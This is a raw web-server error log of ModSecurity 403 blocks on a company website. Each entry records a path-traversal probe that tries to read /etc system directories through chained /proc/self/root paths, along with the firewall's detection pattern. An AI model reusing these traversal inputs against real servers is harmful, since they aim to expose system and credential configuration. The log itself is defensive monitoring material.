[Wed Mar 18 04:04:23.705374 2026] [:error] [pid 29882:tid 140411725141760] [client 74.7.243.128:40632] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pure-ftpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOd0zinOy1jxa1j4fToAAAAQI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:25.100877 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.243.128:40634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOefu8EFLIOrSqIpvHfwAAAlY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:27.260975 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:40644] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOeuoXxyEfFpUF8f8ucAAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:31.093357 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.243.128:40658] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOf-oXxyEfFpUF8f8ufQAAAVg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:33.838735 2026] [:error] [pid 15826:tid 140411733534464] [client 74.7.243.128:42440] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOgeoXxyEfFpUF8f8uhAAAAUE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:34.771539 2026] [:error] [pid 11816:tid 140411540502272] [client 74.7.241.31:39792] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOguw_le52K8_3pV2hCAAAAhg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:35.771630 2026] [:error] [pid 11816:tid 140411599251200] [client 216.73.216.191:51448] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/ld.so.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOg-w_le52K8_3pV2hCQAAAhE"]
[Wed Mar 18 04:04:36.976004 2026] [:error] [pid 19507:tid 140411557287680] [client 216.73.216.191:47944] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOhNY0UrI5A3LftIxTlQAAAZY"]
[Wed Mar 18 04:04:37.055052 2026] [:error] [pid 17653:tid 140411565680384] [client 216.73.216.191:47948] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOhcdf6f5d65gmYZSRxwAAAtU"]
[Wed Mar 18 04:04:38.489870 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:42452] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOhta6ubjKNq_cu4ZXTgAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:39.751016 2026] [:error] [pid 19507:tid 140411658000128] [client 74.7.243.128:40986] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOh9Y0UrI5A3LftIxTmQAAAYo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:42.177681 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:40998] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOivu8EFLIOrSqIpvHhQAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:45.778192 2026] [:error] [pid 19507:tid 140411708356352] [client 74.7.243.128:41000] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOjdY0UrI5A3LftIxToQAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:47.689684 2026] [:error] [pid 30077:tid 140411674785536] [client 216.73.216.191:48094] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOjvu8EFLIOrSqIpvHhwAAAkg"]
[Wed Mar 18 04:04:47.703004 2026] [:error] [pid 30077:tid 140411658000128] [client 216.73.216.191:48100] [client 216.73.216.191] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOj_u8EFLIOrSqIpvHiAAAAko"]
[Wed Mar 18 04:04:47.703016 2026] [:error] [pid 17887:tid 140411590858496] [client 74.7.243.128:41012] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOjwkwaGbbGflqUZDTuAAAANI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:49.110183 2026] [:error] [pid 17887:tid 140411649607424] [client 74.7.243.128:41020] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOkQkwaGbbGflqUZDTuwAAAMs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:50.647368 2026] [:error] [pid 15051:tid 140411666392832] [client 74.7.243.128:48190] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOkimAPhZkrhU8w4ku-AAAAIk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:51.925186 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:48204] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOk9a6ubjKNq_cu4ZXUgAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:53.235142 2026] [:error] [pid 11816:tid 140411607643904] [client 74.7.243.128:48206] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOlew_le52K8_3pV2hCwAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:54.575442 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:48222] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOlta6ubjKNq_cu4ZXUwAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:55.838930 2026] [:error] [pid 11816:tid 140411699963648] [client 74.7.243.128:48238] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOl-w_le52K8_3pV2hDgAAAgU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:55.891652 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.241.31:59340] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOl9Y0UrI5A3LftIxTqgAAAYE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 04:04:58.590806 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.243.128:48244] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOmew_le52K8_3pV2hDwAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 04:04:59.988382 2026] [:error] [pid 26799:tid 140411708356352] [client 74.7.243.128:59724] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpOm9a6ubjKNq_cu4ZXWQAAA0Q"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
